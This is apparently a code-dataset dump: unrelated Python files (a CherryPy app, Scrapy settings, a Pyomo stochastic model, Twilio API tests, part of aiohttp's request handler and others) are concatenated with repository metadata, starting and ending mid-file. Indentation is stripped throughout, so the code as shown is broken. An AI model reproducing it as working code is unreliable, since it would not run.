def addevent(self, feast, date, tradition,origins):
if feast != '' and date != '':
self.feasts.append({
'feast': feast,
'date': date,
'tradition': tradition,
'origins': origins
})
self.savevent()
raise cherrypy.HTTPRedirect('/')
#sauvegarde des ajouts dans la base donnée
def savevent(self):
try:
with open('Bdd.json', 'w', encoding="utf-8") as file:
file.write(json.dumps({
'feasts': self.feasts
}, ensure_ascii=False))
except:
cherrypy.log('Saving database failed.')
@cherrypy.expose
def getfeasts(self):
return json.dumps({
'feasts': self.feasts
}, ensure_ascii=False).encode('utf-8')
#route pour ajouter une fête via kivy
@cherrypy.expose
def deletefeast(self, i):
result = 'KO'
i = int(i)
if 0 <= i < len(self.feasts):
del(self.feasts[i])
result = 'OK'
return result.encode('utf-8')
#route pour ajouter une fête via kivy
@cherrypy.expose
def addfeast(self,feast,date,tradition,origin):
self.feasts.append(
{
'tradition':str(tradition),
'feast':str(feast),
'origins':str(origin),
'date':str(date)
}
)
self.savevent()
if __name__ == '__main__':
# Register Jinja2 plugin and tool
ENV = jinja2.Environment(loader=jinja2.FileSystemLoader('.'))
jinja2plugin.Jinja2TemplatePlugin(cherrypy.engine, env=ENV).subscribe()
cherrypy.tools.template = jinja2tool.Jinja2Tool()
ROOT = os.path.abspath(os.getcwd())
cherrypy.quickstart(WebApp(), '', 'Projet_info.conf')
|
[
"ablo110@live.fr"
] |
ablo110@live.fr
|
2949108488c1b01a6e1884163add585d51810555
|
837fff65705faf7419e15e2f3a7563601c81950d
|
/quotes/quotes/settings.py
|
9ef0c8af0d817aeb4a14e6903a93cc71a8b8de01
|
[] |
no_license
|
abdulazeem/Scrapy-Projects
|
1c7b7ee85cc3026510a01e6f6fe5aa162935694f
|
3d3a217bd246cd72cc3c0b10c1073f1664f9141a
|
refs/heads/master
| 2022-12-03T07:58:41.478320
| 2020-08-24T12:55:58
| 2020-08-24T12:55:58
| 289,927,738
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for quotes project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'quotes'
SPIDER_MODULES = ['quotes.spiders']
NEWSPIDER_MODULE = 'quotes.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'quotes (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'quotes.middlewares.QuotesSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'quotes.middlewares.QuotesDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'quotes.pipelines.QuotesPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
FEED_EXPORT_ENCODING = 'utf-8'
|
[
"azeem012001@gmail.com"
] |
azeem012001@gmail.com
|
51d14d9e353798e5fc1aee069bf86c642f2df85d
|
4b8ac4077e7480817a8ef6be6a5831ee4bdd2b9e
|
/uchu-cli/utils.py
|
203ebd1ecc804a3445fd24218874208472ff6c2d
|
[
"MIT"
] |
permissive
|
UchuServer/cli
|
14c8dfd91d17746d60cd8c08a0865b63e51ad8bf
|
ebe1dbeda4a1035744c32df229e968d4568a6927
|
refs/heads/master
| 2023-06-17T19:04:25.623924
| 2021-07-13T10:16:19
| 2021-07-13T10:16:19
| 321,522,414
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
import requests
from . import commands
def WorkOutLargestCommand() -> int:
Largest: int = 0
for x in commands.CommandList:
if (len(x) + len(GetArgs(x)) + 1) > Largest:
Largest = (len(x) + len(GetArgs(x)) + 1)
return Largest
def GetArgs(Command: str) -> str:
Return: str = ""
if commands.ArgsList[Command][0] == "": return Return
for x in commands.ArgsList[Command]:
Return += "[" + x + "] "
return Return
def Help() -> None:
print("Uchu CLI: ", end="\n\n")
print("\tuchu-cli [IP] [Port] [Subcommand]", end="\n\n")
print("Subcommands: ", end="\n\n")
i: int = 0
Largest: int = WorkOutLargestCommand()
for x in commands.CommandList:
print("\t" + x, end="") # Print Commands
print(" " + GetArgs(x), end="") # Print Args
print(" "*(Largest-(len(x) + 1 + len(GetArgs(x)))), end="") # Print Gap
print(" - " + commands.HelpList[x]) # Print Help List
print("")
exit()
def CheckNetworkConnection(IP: str, Port: int) -> None:
try:
r = requests.get("http://" + IP + ":" + str(Port) + "/")
if r.status_code != 200:
exit()
except:
print("Couldn't connect to master server")
exit()
|
[
"17jbradford@tqacademy.co.uk"
] |
17jbradford@tqacademy.co.uk
|
cf94fdc877f7461b30060f45ddcd56cac0cb6e01
|
6c721f3cfce6dc88396cd3b5f6a59d65a2ea5033
|
/some_learn/Data_Set_handle/Caltech-Dateset/anaylsis_result/draw_result_in_new_anno/src/generate_result2txt.py
|
f9ecc3049084e101fc53fc0cad1d2e16c74bdc91
|
[
"MIT"
] |
permissive
|
unicoe/PycharmProjects
|
20a3dabe88c7874da54451c7bb16999afc0eee35
|
23ff314eb5ac9bfa01a8278089d722b5d0061751
|
refs/heads/master
| 2020-03-23T09:16:25.907188
| 2019-12-21T03:10:49
| 2019-12-21T03:10:49
| 141,377,686
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,733
|
py
|
def generate_result(resource_path, des_path):
"""
:param path:
:return:
"""
des_path1 = "/home/user/PycharmProjects/caltech_new_anno/out/out1.txt"
des_path2 = "/home/user/PycharmProjects/caltech_new_anno/out/out2.txt"
rf = open(resource_path)
content = rf.readline()
cnt = 0
tmp_dict = {}
while content:
#print content
res = content.replace("\n", "").split(" ")
cls = str(res[0:1][0])
bbox = res[1:6]
if cls in tmp_dict:
tmp_dict[cls].append(bbox)
else:
tmp_dict[cls] = [bbox]
cnt += 1
content = rf.readline()
rf.close()
wpath = resource_path.split("/")[-1]
respath = wpath[-9:-4] + "/" + wpath[-4:]
print wpath, respath
wfname = open(des_path, "w")
wfscr = open(des_path1, "w")
wfbbox = open(des_path2, "w")
for key_ in tmp_dict:
wfname.write(str(key_)+',')
for detail in tmp_dict[key_]:
for index in detail:
if index == detail[0]:
wfscr.write(str(index))
else:
if index is detail[1]:
tmpp1 = index
wfbbox.write(str(int(float(index))))
if index is detail[2]:
tmpp2 = index
wfbbox.write(str(int(float(index))))
if index is detail[3]:
wfbbox.write(str(int(float(index) - float(tmpp1))))
if index is detail[4]:
wfbbox.write(str(int(float(index) - float(tmpp2))))
if index is not detail[-1]:
wfbbox.write(",")
if len(tmp_dict[key_]) > 1:
if detail is not tmp_dict[key_][-1]:
wfscr.write(";")
wfbbox.write(";")
wfname.write("\n")
wfscr.write("\n")
wfbbox.write("\n")
wfname.close()
wfscr.close()
wfbbox.close()
generate_result("/home/user/PycharmProjects/caltech_new_anno/3_15_faster1_det_test_person.txt", "/home/user/PycharmProjects/caltech_new_anno/out/out.txt")
# def generate_all_result(path):
# import os
# dirList = []
# fileList = []
#
# files = os.listdir(path)
#
# for f in files:
# if(os.path.isdir(path + "/" + f)):
# if f[0] != '.':
# dirList.append(f)
# if(os.path.isfile(path + '/'+ f)):
# fileList.append(f)
#
# for fl in fileList:
# generate_result(path + fl, "/home/user/PycharmProjects/MissRate_FPPI_plot/out.txt")
#generate_all_result("/home/user/Downloads/caltech_data_set/data_test/")
|
[
"unicoe@163.com"
] |
unicoe@163.com
|
617f2daa7d6f16a5c0dcba89f71b914b51a6c829
|
f1d67722dcd4c2209eedc0a61e5ea0ee27c95470
|
/mpisppy/tests/examples/apl1p.py
|
24988a8f7c43d751af19ab6376eb825d98a0bc64
|
[] |
no_license
|
wangcj05/mpi-sppy
|
08204019b466da5e0812b16dd5cb53da1bdbd793
|
42aff4c11dc42fcba8a9520da00e48c6e9ab7d85
|
refs/heads/main
| 2023-08-25T04:36:58.606490
| 2021-11-01T21:40:14
| 2021-11-01T21:40:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,295
|
py
|
#ReferenceModel for full set of scenarios for APL1P; May 2021
#We use costs from Bailey, Jensen and Morton, Response Surface Analysis of Two-Stage Stochastic Linear Programming with Recourse
#(costs are 10x higher than in the original [Infanger 1992] paper)
import pyomo.environ as pyo
import numpy as np
import mpisppy.scenario_tree as scenario_tree
import mpisppy.utils.sputils as sputils
import mpisppy.utils.amalgomator as amalgomator
# Use this random stream:
apl1pstream = np.random.RandomState()
def APL1P_model_creator(seed):
apl1pstream.seed(seed)
random_array = apl1pstream.rand(6) #We only use 5 random numbers
#
# Model
#
model = pyo.ConcreteModel()
#
# Parameters
#
# generator
model.G = [1,2]
# Demand level
model.DL = [1,2,3]
# Availability
avail_outcome = ([1.,0.9,0.5,0.1],[1.,0.9,0.7,0.1,0.0])
avail_probability = ([0.2,0.3,0.4,0.1],[0.1,0.2,0.5,0.1,0.1])
avail_cumprob = (np.cumsum(avail_probability[0]),np.cumsum(avail_probability[1]))
assert(max(avail_cumprob[0])==1.0 and max(avail_cumprob[1])==1.0)
def availability_init(m,g):
rd = random_array[g]
i = np.searchsorted(avail_cumprob[g-1],rd)
return avail_outcome[g-1][i]
model.Availability = pyo.Param(model.G, within=pyo.NonNegativeReals,
initialize=availability_init)
# Min Capacity
cmin_init = 1000
model.Cmin = pyo.Param(model.G, within=pyo.NonNegativeReals, initialize=cmin_init)
# Investment, aka Capacity costs
invest = np.array([4.,2.5])
def investment_init(m,g):
return(invest[g-1])
model.Investment = pyo.Param(model.G, within=pyo.NonNegativeReals,
initialize=investment_init)
# Operating Cost
op_cost = np.array([[4.3,2.0,0.5],[8.7,4.0,1.0]])
def operatingcost_init(m,g,dl):
return(op_cost[g-1,dl-1])
model.OperatingCost = pyo.Param(model.G, model.DL, within=pyo.NonNegativeReals,
initialize = operatingcost_init)
# Demand
demand_outcome = [900,1000,1100,1200]
demand_prob = [.15,.45,.25,.15]
demand_cumprob = np.cumsum(demand_prob)
assert(max(demand_cumprob) == 1.0)
def demand_init(m,dl):
rd = random_array[2+dl]
i = np.searchsorted(demand_cumprob,rd)
return demand_outcome[i]
model.Demand = pyo.Param(model.DL, within=pyo.NonNegativeReals,
initialize=demand_init)
# Cost of unserved demand
unserved_cost =10.0
model.CostUnservedDemand = pyo.Param(model.DL, within=pyo.NonNegativeReals,
initialize=unserved_cost)
#
# Variables
#
# Capacity of generators
model.CapacityGenerators = pyo.Var(model.G, domain=pyo.NonNegativeReals)
# Operation level
model.OperationLevel = pyo.Var(model.G, model.DL, domain=pyo.NonNegativeReals)
# Unserved demand
model.UnservedDemand = pyo.Var(model.DL, domain=pyo.NonNegativeReals)
#
# Constraints
#
# Minimum capacity
def MinimumCapacity_rule(model, g):
return model.CapacityGenerators[g] >= model.Cmin[g]
model.MinimumCapacity = pyo.Constraint(model.G, rule=MinimumCapacity_rule)
# Maximum operating level
def MaximumOperating_rule(model, g):
return sum(model.OperationLevel[g, dl] for dl in model.DL) <= model.Availability[g] * model.CapacityGenerators[g]
model.MaximumOperating = pyo.Constraint(model.G, rule=MaximumOperating_rule)
# Satisfy demand
def SatisfyDemand_rule(model, dl):
return sum(model.OperationLevel[g, dl] for g in model.G) + model.UnservedDemand[dl] >= model.Demand[dl]
model.SatisfyDemand = pyo.Constraint(model.DL, rule=SatisfyDemand_rule)
#
# Stage-specific cost computations
#
def ComputeFirstStageCost_rule(model):
return sum(model.Investment[g] * model.CapacityGenerators[g] for g in model.G)
model.FirstStageCost = pyo.Expression(rule=ComputeFirstStageCost_rule)
def ComputeSecondStageCost_rule(model):
expr = sum(
model.OperatingCost[g, dl] * model.OperationLevel[g, dl] for g in model.G for dl in model.DL) + sum(
model.CostUnservedDemand[dl] * model.UnservedDemand[dl] for dl in model.DL)
return expr
model.SecondStageCost = pyo.Expression(rule=ComputeSecondStageCost_rule)
def total_cost_rule(model):
return model.FirstStageCost + model.SecondStageCost
model.Total_Cost_Objective = pyo.Objective(rule=total_cost_rule, sense=pyo.minimize)
return(model)
def scenario_creator(sname, num_scens=None):
scennum = sputils.extract_num(sname)
model = APL1P_model_creator(scennum)
# Create the list of nodes associated with the scenario (for two stage,
# there is only one node associated with the scenario--leaf nodes are
# ignored).
model._mpisppy_node_list = [
scenario_tree.ScenarioNode(
name="ROOT",
cond_prob=1.0,
stage=1,
cost_expression=model.Total_Cost_Objective,
scen_name_list=None, # Deprecated?
nonant_list=[model.CapacityGenerators],
scen_model=model,
)
]
#Add the probability of the scenario
if num_scens is not None :
model._mpisppy_probability = 1/num_scens
return(model)
#=========
def scenario_names_creator(num_scens,start=None):
# (only for Amalgomator): return the full list of num_scens scenario names
# if start!=None, the list starts with the 'start' labeled scenario
if (start is None) :
start=0
return [f"scen{i}" for i in range(start,start+num_scens)]
#=========
def inparser_adder(inparser):
# (only for Amalgomator): add command options unique to apl1p
pass
#=========
def kw_creator(options):
# (only for Amalgomator): linked to the scenario_creator and inparser_adder
kwargs = {"num_scens" : options['num_scens'] if 'num_scens' in options else None,
}
return kwargs
#============================
def scenario_denouement(rank, scenario_name, scenario):
pass
#============================
def xhat_generator_apl1p(scenario_names, solvername="gurobi", solver_options=None):
'''
For sequential sampling.
Takes scenario names as input and provide the best solution for the
approximate problem associated with the scenarios.
Parameters
----------
scenario_names: int
Names of the scenario we use
solvername: str, optional
Name of the solver used. The default is "gurobi"
solver_options: dict, optional
Solving options. The default is None.
Returns
-------
xhat: str
A generated xhat, solution to the approximate problem induced by scenario_names.
'''
num_scens = len(scenario_names)
ama_options = { "EF-2stage": True,
"EF_solver_name": solvername,
"EF_solver_options": solver_options,
"num_scens": num_scens,
"_mpisppy_probability": 1/num_scens,
}
#We use from_module to build easily an Amalgomator object
ama = amalgomator.from_module("mpisppy.tests.examples.apl1p",
ama_options,use_command_line=False)
#Correcting the building by putting the right scenarios.
ama.scenario_names = scenario_names
ama.run()
# get the xhat
xhat = sputils.nonant_cache_from_ef(ama.ef)
return xhat
if __name__ == "__main__":
#An example of sequential sampling for the APL1P model
from mpisppy.confidence_intervals.seqsampling import SeqSampling
optionsFSP = {'eps': 5.0,
'solvername': "gurobi_direct",
"c0":50,}
apl1p_pb = SeqSampling("mpisppy.tests.examples.apl1p",
xhat_generator_apl1p,
optionsFSP,
stopping_criterion="BPL",
stochastic_sampling=False)
res = apl1p_pb.run()
print(res)
|
[
"sylvain.czx@gmail.com"
] |
sylvain.czx@gmail.com
|
3fe76d3f252cdb4ef3b8aa1b2bd57309ffc10491
|
50888c8f98b0f86f60c5aba2f5bb2e127033f78f
|
/apps/utils/redis_obj.py
|
aa88f7bbf2f428ab499697fd67d6faa17755e9ff
|
[] |
no_license
|
nhb-git/mxOnline
|
83b2325812cfc599f0921c989b6bd687a8f37ed2
|
7d5d7c2361f9a38ed0e1c88344bb2f5125f0fbb9
|
refs/heads/master
| 2022-12-05T23:15:26.273598
| 2020-09-03T00:11:11
| 2020-09-03T00:11:11
| 287,920,982
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 356
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 开发人员 :Davis Niu
# 开发时间 :8/16/2020 1:37 AM
# 文件名称 :redis_obj.py
import redis
from MxOnline.settings import REDIS_HOST, REDIS_PORT
def redis_obj(host=REDIS_HOST, port=REDIS_PORT):
r = redis.Redis(host, port, db=0, charset='utf8', decode_responses=True)
return r
|
[
"niuhaibao@gmail.com"
] |
niuhaibao@gmail.com
|
8ce07f08c2d9e49656282ac45274bda28b6f7c7b
|
1dab646570a8ac9af92b15031883f874307a0ca9
|
/111.py
|
825a9181a8da58753c1b9661724e20767b48793e
|
[] |
no_license
|
reshmapalani/pythonprogram
|
8854bd5da4bc5f7b523a07f9c0be7b1ec5b8ae22
|
88b203168a412d42dd4ebfde3453a216a3a4c26a
|
refs/heads/master
| 2020-04-27T16:58:49.845751
| 2019-05-15T18:30:59
| 2019-05-15T18:30:59
| 174,499,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 160
|
py
|
import random
d = {8:37,38:9,11:2,13:34,40:68,65:46,52:81}
p = random.choice([2,8,9,13,40,65,52])
print("You got",p)
if p in d:
print("You can go to ",d[p])
|
[
"noreply@github.com"
] |
reshmapalani.noreply@github.com
|
cd88987a7e86a3cba2b431e4cd63332219704a57
|
951de9221b0b3cfc20ad0ad45ec751be614a8709
|
/tests/integration/messaging/v1/test_brand_registration.py
|
6e6be298a71a6cf42b880de0a98e916ed3c44d85
|
[
"MIT"
] |
permissive
|
HireAnEsquire/twilio-python
|
6762e2467504e25290e7fb604d851d586dde18a4
|
48e970fa0b4b46be5ee560a1de5976ca3ad69fef
|
refs/heads/main
| 2023-06-30T08:25:01.735944
| 2021-08-03T20:24:14
| 2021-08-03T20:24:14
| 391,991,328
| 0
| 0
|
MIT
| 2021-08-02T14:58:54
| 2021-08-02T14:58:53
| null |
UTF-8
|
Python
| false
| false
| 5,456
|
py
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class BrandRegistrationTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations/BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"date_created": "2021-01-27T14:18:35Z",
"date_updated": "2021-01-27T14:18:36Z",
"status": "PENDING",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42
}
'''
))
actual = self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations.list()
self.holodeck.assert_has_request(Request(
'get',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
))
def test_read_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0",
"previous_page_url": null,
"next_page_url": null,
"key": "data",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0"
},
"data": [
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"date_created": "2021-01-27T14:18:35Z",
"date_updated": "2021-01-27T14:18:36Z",
"status": "APPROVED",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42
}
]
}
'''
))
actual = self.client.messaging.v1.brand_registrations.list()
self.assertIsNotNone(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")
values = {
'CustomerProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
'A2PProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
}
self.holodeck.assert_has_request(Request(
'post',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU0000009f7e067e279523808d267e2d90",
"a2p_profile_bundle_sid": "BU1111109f7e067e279523808d267e2d85",
"date_created": "2021-01-28T10:45:51Z",
"date_updated": "2021-01-28T10:45:51Z",
"status": "PENDING",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42
}
'''
))
actual = self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")
self.assertIsNotNone(actual)
|
[
"team_interfaces+github@twilio.com"
] |
team_interfaces+github@twilio.com
|
18110511b08e58d3d47e69557d3cd22b3cb3d6ff
|
9842fd63e3476dc58e0b2fc09e3c9f573c1fe054
|
/lwc/middleware.py
|
b9eedeff4c3167b07f9d2da071f03e171e604062
|
[] |
no_license
|
pythonista6785/Launching-With-Code-lwc-
|
e8e6c1812bbbea10e5e2e27858fae90fd68683b5
|
b454fe352b546ce522ef9ab1aa92b4fdbe600e52
|
refs/heads/master
| 2021-04-28T23:44:03.779846
| 2017-01-06T10:50:41
| 2017-01-06T10:50:41
| 77,728,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
from joins.models import Join
class ReferMiddleware():
def process_request(self, request):
ref_id = request.GET.get("ref")
#print ref_id
try:
obj = Join.objects.get(ref_id = ref_id)
except:
obj = None
if obj:
request.session["join_id_ref"] = obj.id
|
[
"pythonista.hlp@gmail.com"
] |
pythonista.hlp@gmail.com
|
d63468cc5addf7f2c479859b8f107f50a4eb9d1c
|
d5e16a3880ad978eafef136ebf554297e5c9a30f
|
/elan2mqtt/aiohttp/web_protocol.py
|
ad0c0498e39562e30f1f8275a719b554a813b06c
|
[
"MIT"
] |
permissive
|
zdar/elan2mqtt
|
42333ec7e8bb53f5946f0916fc4a39ba05294e24
|
c8a21ea3e1dc80a360aed2d7eadf74ee5a3efcd4
|
refs/heads/master
| 2023-02-04T23:57:16.480168
| 2023-01-20T09:49:31
| 2023-01-20T09:49:31
| 156,423,532
| 11
| 5
|
MIT
| 2022-01-28T08:56:10
| 2018-11-06T17:44:01
|
Python
|
UTF-8
|
Python
| false
| false
| 22,548
|
py
|
import asyncio
import asyncio.streams
import traceback
import warnings
from collections import deque
from contextlib import suppress
from html import escape as html_escape
from http import HTTPStatus
from logging import Logger
from typing import (
TYPE_CHECKING,
Any,
Awaitable,
Callable,
Deque,
Optional,
Sequence,
Tuple,
Type,
Union,
cast,
)
import attr
import yarl
from .abc import AbstractAccessLogger, AbstractStreamWriter
from .base_protocol import BaseProtocol
from .helpers import ceil_timeout
from .http import (
HttpProcessingError,
HttpRequestParser,
HttpVersion10,
RawRequestMessage,
StreamWriter,
)
from .log import access_logger, server_logger
from .streams import EMPTY_PAYLOAD, StreamReader
from .tcp_helpers import tcp_keepalive
from .web_exceptions import HTTPException
from .web_log import AccessLogger
from .web_request import BaseRequest
from .web_response import Response, StreamResponse
__all__ = ("RequestHandler", "RequestPayloadError", "PayloadAccessError")
if TYPE_CHECKING: # pragma: no cover
from .web_server import Server
_RequestFactory = Callable[
[
RawRequestMessage,
StreamReader,
"RequestHandler",
AbstractStreamWriter,
"asyncio.Task[None]",
],
BaseRequest,
]
_RequestHandler = Callable[[BaseRequest], Awaitable[StreamResponse]]
ERROR = RawRequestMessage(
"UNKNOWN",
"/",
HttpVersion10,
{}, # type: ignore[arg-type]
{}, # type: ignore[arg-type]
True,
None,
False,
False,
yarl.URL("/"),
)
class RequestPayloadError(Exception):
"""Payload parsing error."""
class PayloadAccessError(Exception):
"""Payload was accessed after response was sent."""
@attr.s(auto_attribs=True, frozen=True, slots=True)
class _ErrInfo:
status: int
exc: BaseException
message: str
_MsgType = Tuple[Union[RawRequestMessage, _ErrInfo], StreamReader]
class RequestHandler(BaseProtocol):
"""HTTP protocol implementation.
RequestHandler handles incoming HTTP request. It reads request line,
request headers and request payload and calls handle_request() method.
By default it always returns with 404 response.
RequestHandler handles errors in incoming request, like bad
status line, bad headers or incomplete payload. If any error occurs,
connection gets closed.
keepalive_timeout -- number of seconds before closing
keep-alive connection
tcp_keepalive -- TCP keep-alive is on, default is on
debug -- enable debug mode
logger -- custom logger object
access_log_class -- custom class for access_logger
access_log -- custom logging object
access_log_format -- access log format string
loop -- Optional event loop
max_line_size -- Optional maximum header line size
max_field_size -- Optional maximum header field size
max_headers -- Optional maximum header size
"""
KEEPALIVE_RESCHEDULE_DELAY = 1
__slots__ = (
"_request_count",
"_keepalive",
"_manager",
"_request_handler",
"_request_factory",
"_tcp_keepalive",
"_keepalive_time",
"_keepalive_handle",
"_keepalive_timeout",
"_lingering_time",
"_messages",
"_message_tail",
"_waiter",
"_task_handler",
"_upgrade",
"_payload_parser",
"_request_parser",
"_reading_paused",
"logger",
"debug",
"access_log",
"access_logger",
"_close",
"_force_close",
"_current_request",
)
def __init__(
self,
manager: "Server",
*,
loop: asyncio.AbstractEventLoop,
keepalive_timeout: float = 75.0, # NGINX default is 75 secs
tcp_keepalive: bool = True,
logger: Logger = server_logger,
access_log_class: Type[AbstractAccessLogger] = AccessLogger,
access_log: Logger = access_logger,
access_log_format: str = AccessLogger.LOG_FORMAT,
debug: bool = False,
max_line_size: int = 8190,
max_headers: int = 32768,
max_field_size: int = 8190,
lingering_time: float = 10.0,
read_bufsize: int = 2 ** 16,
auto_decompress: bool = True,
):
super().__init__(loop)
self._request_count = 0
self._keepalive = False
self._current_request = None # type: Optional[BaseRequest]
self._manager = manager # type: Optional[Server]
self._request_handler: Optional[_RequestHandler] = manager.request_handler
self._request_factory: Optional[_RequestFactory] = manager.request_factory
self._tcp_keepalive = tcp_keepalive
# placeholder to be replaced on keepalive timeout setup
self._keepalive_time = 0.0
self._keepalive_handle = None # type: Optional[asyncio.Handle]
self._keepalive_timeout = keepalive_timeout
self._lingering_time = float(lingering_time)
self._messages: Deque[_MsgType] = deque()
self._message_tail = b""
self._waiter = None # type: Optional[asyncio.Future[None]]
self._task_handler = None # type: Optional[asyncio.Task[None]]
self._upgrade = False
self._payload_parser = None # type: Any
self._request_parser = HttpRequestParser(
self,
loop,
read_bufsize,
max_line_size=max_line_size,
max_field_size=max_field_size,
max_headers=max_headers,
payload_exception=RequestPayloadError,
auto_decompress=auto_decompress,
) # type: Optional[HttpRequestParser]
self.logger = logger
self.debug = debug
self.access_log = access_log
if access_log:
self.access_logger = access_log_class(
access_log, access_log_format
) # type: Optional[AbstractAccessLogger]
else:
self.access_logger = None
self._close = False
self._force_close = False
def __repr__(self) -> str:
return "<{} {}>".format(
self.__class__.__name__,
"connected" if self.transport is not None else "disconnected",
)
@property
def keepalive_timeout(self) -> float:
return self._keepalive_timeout
async def shutdown(self, timeout: Optional[float] = 15.0) -> None:
"""Do worker process exit preparations.
We need to clean up everything and stop accepting requests.
It is especially important for keep-alive connections.
"""
self._force_close = True
if self._keepalive_handle is not None:
